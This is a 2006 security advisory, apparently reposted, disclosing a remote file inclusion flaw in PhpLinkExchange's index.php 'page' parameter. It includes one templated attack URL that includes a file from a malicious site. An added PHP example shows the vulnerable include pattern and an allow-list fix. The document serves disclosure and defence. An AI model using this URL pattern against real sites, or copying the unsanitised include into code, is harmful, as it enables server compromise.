by r0t,der4444,cembo,VietMafia

Thursday, July 20, 2006

PhpLinkExchange remote File Inclusion Vuln.

###############################################
Vuln. discovered by: r0t
Date: 20 July 2006
Vendor: www.idevspot.com/PhpLinkExchange.php
Affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows remote file inclusion, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing a URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
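
One way to apply the solution above, as an added example that is not PhpLinkExchange's code or the advisory author's. The advisory does not show index.php, so the direct include of the "page" parameter is an assumed pattern, and the page names and file paths are hypothetical.

```php
<?php
// Added illustration, not PhpLinkExchange source code.
// Page names and file paths below are hypothetical.

// Assumed vulnerable pattern: the request value goes straight into include,
// so a URL in "page" is fetched and executed when URL includes are enabled.
//     include($_GET['page']);

// Hardened pattern: the request value is only a lookup key. The path handed
// to include always comes from this fixed table, never from the request.
const PAGES = [
    'home'   => 'pages/home.php',
    'links'  => 'pages/links.php',
    'submit' => 'pages/submit.php',
];

function resolve_page($requested): string
{
    // Reject non-strings (e.g. page[]=x arrives as an array) and unknown keys.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$requested];
}

// Constructed inputs: a valid key, the advisory's URL form, an array, no value.
$samples = ['links', 'http://[malicious_site]/file', ['x'], null];
foreach ($samples as $input) {
    $shown = json_encode($input, JSON_UNESCAPED_SLASHES);
    printf("%-34s -> %s\n", $shown, resolve_page($input));
}

// In index.php the include then becomes:
//     include __DIR__ . '/' . resolve_page($_GET['page'] ?? 'home');
```

As a second layer, setting allow_url_include = Off in php.ini (available from PHP 5.2.0) stops include from accepting URL wrappers even if a code path is missed.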

Copyright (c) 2006 Pridels Sec Crew